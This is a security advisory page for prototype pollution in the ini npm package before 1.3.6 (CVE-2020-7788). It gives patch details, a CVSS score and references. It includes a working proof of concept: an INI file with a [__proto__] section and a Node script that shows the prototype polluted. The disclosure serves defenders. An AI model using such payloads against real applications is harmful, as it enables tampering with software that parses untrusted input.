Ecosyste.ms: Advisories

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXFxZ3gtMnAyaC05YzM3

ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)

> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

Permalink: https://github.com/advisories/GHSA-qqgx-2p2h-9c37
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXFxZ3gtMnAyaC05YzM3
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: 9 months ago

CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Identifiers: GHSA-qqgx-2p2h-9c37, CVE-2020-7788
References:

• https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
• https://www.npmjs.com/advisories/1589
• https://snyk.io/vuln/SNYK-JS-INI-1048974
• https://nvd.nist.gov/vuln/detail/CVE-2020-7788
• https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
• https://github.com/advisories/GHSA-qqgx-2p2h-9c37

Repository: https://github.com/npm/ini
Blast Radius: 46.0

Affected Packages